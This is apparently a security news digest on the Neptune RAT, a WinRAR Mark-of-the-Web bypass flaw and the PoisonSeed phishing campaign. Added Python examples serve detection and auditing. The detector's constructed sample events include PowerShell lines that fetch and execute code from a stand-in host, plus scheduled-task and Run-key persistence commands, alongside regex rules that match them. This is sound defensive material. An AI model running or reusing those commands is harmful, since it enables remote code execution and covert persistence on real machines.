Neptune RAT: Emerging Threat with Deep System Access and Persistent Capabilities
Neptune RAT is a newly identified Remote Access Trojan targeting Windows systems, engineered in Visual Basic .NET and distributed across platforms including GitHub, Telegram, and YouTube. It is promoted as a premium tool for cybercriminals, although it is only available as an obfuscated executable without source code, which makes it difficult for analysts to dissect. Once deployed, it abuses PowerShell commands, including 'Invoke-RestMethod' and 'Invoke-Expression', to download and execute hidden payloads from external sources, often hosted on content-sharing platforms. These files are dropped into the AppData\Roaming directory, where the malware copies itself and registers for startup via Windows Registry modifications. Neptune RAT's core functionality includes harvesting credentials from over 270 software applications, altering cryptocurrency wallet addresses copied to the clipboard, deploying ransomware, monitoring the desktop in real time, and manipulating critical system functions. It can also rewrite the Master Boot Record, effectively bricking the system, and disable antivirus software to maintain control without interruption. The malware ensures persistence by creating hidden scheduled tasks with schtasks.exe and adding keys under the Windows Registry Run path. Neptune RAT includes built-in virtual machine detection, checking system properties to determine whether it is being analyzed and terminating if a sandbox or VM is found. Its ransomware component encrypts files and appends a "[.]ENC" extension, while ransom instructions are dropped as an HTML file on the desktop. The malware's developers have created a GUI builder to customize builds and are actively marketing enhanced paid versions, with indications of ties to organized underground groups. Neptune RAT's combination of stealth, destructive capability, and data theft makes it a growing concern in the malware landscape.
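Added example, not code from the report or from the malware: Python detection logic run over constructed process-creation command lines, flagging the three behaviours described above (PowerShell Invoke-RestMethod piped into Invoke-Expression, schtasks /create pointing into AppData\Roaming, and reg add to the Run key). The rule patterns and the sample events are my assumptions for illustration, not indicators taken from the page.

```python
import re

# Constructed process-creation events for this example, not real telemetry.
# Format: "<image>|<command line>". Hosts use .invalid so nothing resolves.
SAMPLE_EVENTS = [
    r'powershell.exe|powershell -w hidden -c "Invoke-RestMethod -Uri https://example.invalid/p.txt | Invoke-Expression"',
    "powershell.exe|powershell -nop -c \"irm 'https://example.invalid/a' | iex\"",
    r'schtasks.exe|schtasks /create /sc onlogon /tn Updater /tr "C:\Users\u\AppData\Roaming\svc.exe" /f',
    r'reg.exe|reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svc /t REG_SZ /d C:\Users\u\AppData\Roaming\svc.exe',
    r'powershell.exe|powershell -c "Get-Process | Out-File procs.txt"',
    r'schtasks.exe|schtasks /query /tn Updater',
]

# Each rule is (name, pattern); patterns are assumed heuristics, case-insensitive.
RULES = [
    # Download cmdlet (or its alias) feeding Invoke-Expression / iex in one command line.
    ("ps_download_and_execute",
     re.compile(r"(invoke-restmethod|\birm\b|invoke-webrequest|\biwr\b).*(invoke-expression|\biex\b)", re.I)),
    # Scheduled task created whose action lives under the user's AppData\Roaming.
    ("schtasks_roaming_persistence",
     re.compile(r"schtasks.*/create.*\\appdata\\roaming\\", re.I)),
    # reg add against a CurrentVersion\Run autostart key.
    ("registry_run_key_persistence",
     re.compile(r"\breg(\.exe)?\s+add\b.*\\currentversion\\run\b", re.I)),
]


def match_rules(command_line):
    """Return the names of every rule the command line triggers (empty list if none)."""
    return [name for name, rx in RULES if rx.search(command_line)]


def scan_events(events):
    """Split each 'image|command' event and keep those that trigger at least one rule."""
    hits = []
    for event in events:
        image, _, command = event.partition("|")
        rules = match_rules(command)
        if rules:
            hits.append({"image": image, "command": command, "rules": rules})
    return hits


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(", ".join(hit["rules"]), "<-", hit["command"])
```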
WinRAR CVE-2025-31334: MotW Bypass Enables Silent Code Execution via Symlinks
A newly disclosed vulnerability, CVE-2025-31334, impacts all versions of WinRAR before 7.11 and allows threat actors to bypass Windows' Mark of the Web (MotW) warnings. MotW is a native Windows security feature that flags files downloaded from the internet with metadata to alert users before opening potentially unsafe content. This flaw involves symbolic links (symlinks) created within a RAR archive. If a user opens a symlink from the WinRAR interface that points to an executable file, the MotW tag is ignored, and the file runs without warning. The attacker must have administrative privileges to create the symlink on a victim’s system, but once deployed, it enables silent execution of arbitrary code without triggering the usual security prompt. This issue has been resolved in WinRAR version 7.11, which now enforces MotW metadata when launching executables through symlinks. Although the vulnerability holds a medium severity score of 6.8, its potential for abuse is significant, especially considering past exploitation patterns. MotW bypasses have been a common tactic in malware delivery chains used by advanced threat actors, including state-sponsored groups. In a recent example, Russian hackers abused a MotW bypass in 7-Zip through double archiving to distribute Smokeloader without detection. This new WinRAR flaw could enable similar attack vectors unless users update immediately. It was responsibly reported by Shimamine Taihei through Japan’s Information Technology Promotion Agency, with coordination from the national CSIRT. Since version 7.10, WinRAR has also introduced options to strip potentially sensitive MotW data like download URLs or IP addresses, which—while addressing privacy—could further open the door to abuse if misunderstood or misused. This latest disclosure underscores the ongoing risk posed by improperly handled MotW metadata in file archiving utilities.
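Added example, not code from the advisory or from WinRAR: a Python audit that walks an extracted archive, flags symlinks whose target is an executable, and reads the target's Zone.Identifier stream (the NTFS alternate data stream that carries MotW) to report whether the target is marked. The executable-suffix list, the read_zone hook and the constructed demo tree are my assumptions; on filesystems without alternate data streams the real reader always returns None.

```python
import os
import re
import tempfile
from pathlib import Path

# Suffixes Windows launches directly; an assumed list for this audit.
EXECUTABLE_SUFFIXES = {".exe", ".dll", ".bat", ".cmd", ".ps1", ".scr", ".com", ".js", ".vbs", ".msi"}


def read_zone_identifier(path):
    """Read the Zone.Identifier alternate data stream that carries MotW on NTFS.
    Returns None when the stream is absent (no MotW) or the filesystem has no ADS."""
    try:
        with open(f"{path}:Zone.Identifier", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None


def zone_id(stream_text):
    """Extract the numeric ZoneId (3 = Internet) from a Zone.Identifier stream, or None."""
    m = re.search(r"ZoneId=(\d+)", stream_text or "")
    return int(m.group(1)) if m else None


def audit_extracted_symlinks(root, read_zone=read_zone_identifier):
    """List symlinks under root whose target is an executable and whether that target
    carries a MotW zone; read_zone is injectable so the audit runs on non-NTFS systems."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            link = Path(dirpath) / name
            if not link.is_symlink():
                continue
            target = Path(os.path.realpath(link))
            if target.suffix.lower() in EXECUTABLE_SUFFIXES:
                zid = zone_id(read_zone(target))
                findings.append({"link": str(link), "target": str(target),
                                 "zone_id": zid, "motw_present": zid is not None})
    return findings


def build_demo_tree():
    """Constructed stand-in for an extracted archive: a file posing as an executable
    plus a symlink to it (the entry a user would click), in a fresh temp directory."""
    root = Path(tempfile.mkdtemp(prefix="rar_audit_"))
    payload = root / "payload.exe"
    payload.write_bytes(b"not a real executable")
    os.symlink(payload, root / "Invoice.txt")
    return root


if __name__ == "__main__":
    for f in audit_extracted_symlinks(build_demo_tree()):
        print("UNMARKED" if not f["motw_present"] else "marked", f["link"], "->", f["target"])
```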
PoisonSeed: Phishing Campaign Hijacks CRM Accounts to Steal Cryptocurrency
PoisonSeed is an ongoing phishing campaign targeting individuals and organizations by compromising accounts tied to major CRM and bulk email services. The attackers begin by identifying high-value targets with access to platforms like Mailchimp, SendGrid, HubSpot, Mailgun, and Zoho, often luring them through spoofed login pages designed to resemble the legitimate services. Once they gain access, they create new API keys to retain control even if the original account owners reset their passwords. The attackers then export mailing lists and use the hijacked accounts to send crypto-themed phishing emails to thousands of users. These emails impersonate legitimate services, typically Coinbase or Ledger, instructing recipients to set up a new wallet using a provided seed phrase. Because the attackers already hold that seed, any victim who imports it is using a wallet under the attackers' control, and any funds transferred into it can be siphoned off immediately. The poisoned seed phrase trick is framed as a legitimate migration or upgrade, making it appear urgent and trustworthy. Attackers sometimes use domain names like mailchimp-sso[.]com to lend credibility to their phishing emails. Despite similarities to earlier campaigns, Silent Push analysts note that the phishing kit used here is unique, which suggests a separate actor or an evolved toolset. The broader ecosystem behind these attacks, often called "The Com," continues to blend social engineering with technical abuse of trusted marketing infrastructure. The most effective countermeasure is awareness: users should never use pre-written seed phrases from an email and should independently verify any platform-related requests by logging in through official channels.